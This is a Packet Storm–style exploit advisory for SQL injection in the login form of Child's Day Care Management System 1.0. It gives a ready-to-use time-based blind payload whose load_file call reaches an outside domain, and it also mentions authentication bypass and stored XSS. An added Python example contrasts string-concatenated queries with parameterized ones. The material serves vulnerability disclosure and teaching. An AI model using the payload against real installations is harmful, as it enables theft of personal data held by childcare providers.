## https://sploitus.com/exploit?id=PACKETSTORM:165325
## Title: Child's Day Care Management System 1.0 SQL - Injection  
## Author: nu11secur1ty  
## Date: 12.16.2021  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html  
  
  
## Description:  
The `username` parameter of Login.php in Child's Day Care
Management System 1.0 appears to be vulnerable to SQL injection
attacks.
The payload '+(select  
load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'  
was submitted in the username parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the
injected SQL query was executed. The system is also vulnerable to
authentication bypass via SQL injection and to stored XSS attacks.
An attacker can retrieve all information from the system by using
these vulnerabilities. Status: CRITICAL
  
[+] Payload:  
  
```mysql  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=zCAMOHlX'+(select  
load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''  
AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND  
'wBYn'='wBYn&password=a6O!j4g!Z5  
---  
  
```  
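
The difference between splicing the `username` value into the query text and binding it as a parameter, shown as an added example that is not the application's code or the advisory author's. SQLite stands in for MySQL, `load_file` is a stub that only records that it was called, and the `users` schema and the `canary.example.invalid` host are constructed assumptions.

```python
import sqlite3

# Constructed input in the shape of the advisory's payload; the host is a placeholder.
PAYLOAD = r"zCAMOHlX'+(select load_file('\\\\canary.example.invalid\\ztd'))+'"


def make_db():
    """In-memory SQLite stand-in for the application's MySQL database."""
    calls = []
    conn = sqlite3.connect(":memory:")
    # Stub load_file: records its argument, touches no file or network.
    conn.create_function("load_file", 1, lambda path: calls.append(path))
    # Hypothetical schema; the real application's tables are not shown on the page.
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users (username) VALUES ('admin')")
    return conn, calls


def lookup_concatenated(conn, username):
    """Vulnerable pattern: the input becomes part of the SQL text."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Hardened pattern: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    """Return how often the stub ran for each query style."""
    conn, calls = make_db()
    lookup_concatenated(conn, PAYLOAD)
    ran_when_concatenated = len(calls)
    calls.clear()
    lookup_parameterized(conn, PAYLOAD)
    ran_when_bound = len(calls)
    return ran_when_concatenated, ran_when_bound


if __name__ == "__main__":
    print(demo())
```

In PHP the bound form corresponds to a prepared statement (mysqli or PDO) with the username passed as a bound parameter.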
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)  
  
## Proof and Exploit:  
[href](https://streamable.com/tvbuoi)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>